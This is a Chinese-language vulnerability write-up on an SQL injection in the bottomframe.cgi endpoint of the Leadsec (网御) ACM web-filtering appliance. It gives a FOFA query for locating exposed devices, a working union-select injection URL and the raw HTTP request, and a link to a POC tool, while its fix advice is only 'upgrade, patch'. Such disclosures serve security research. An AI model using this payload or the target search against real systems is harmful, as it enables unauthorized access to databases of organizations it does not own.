网御ACM上网行为管理系统存在SQL注入漏洞【小龙检测工具已更公开】

网御ACM上网行为管理系统bottomframe.cgi接口存在SQL注入漏洞

  • 一. 系统简介
  • 二.漏洞描述
  • 三.影响版本
  • 四.fofa查询语句
  • 五.漏洞复现
    • 执行md5(1)函数
    • 执行user()
  • 六.POC&EXP
  • 七、修复建议

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一. 系统简介

网御上网行为管理系统(简称Leadsec ACM)是网御为互联网接入用户在信息内容安全、网络应用管理、组织运营效率、网络资源利用、法律风险规避及网络投资回报等方面提供的全方位解决方案。网御上网行为管理系统存在SQL注入漏洞。

二.漏洞描述

网御 ACM上网行为管理系统 bottomframe.cgi接口存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库权限进行敏感操作。

CVE编号:

CNNVD编号:

CNVD编号:

三.影响版本

网御ACM上网行为管理系统存在SQL注入漏洞【小龙检测工具已更公开】_第1张图片

四.fofa查询语句

app=“网御星云-上网行为管理系统”

五.漏洞复现

漏洞链接:https://127.0.0.1/bottomframe.cgi?user_name=%27))%20union%20select%20md5(1)%23

漏洞数据包:

GET /bottomframe.cgi?user_name=%27))%20union%20select%20md5(1)%23 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

执行md5(1)函数

网御ACM上网行为管理系统存在SQL注入漏洞【小龙检测工具已更公开】_第2张图片

执行user()

网御ACM上网行为管理系统存在SQL注入漏洞【小龙检测工具已更公开】_第3张图片

六.POC&EXP

小龙POC传送门【已经更新】: 小龙POC工具
网御ACM上网行为管理系统存在SQL注入漏洞【小龙检测工具已更公开】_第4张图片

七、修复建议

升级,打补丁

你可能感兴趣的:(网络安全漏洞复现,#,SQL注入实战与POC,sql,数据库)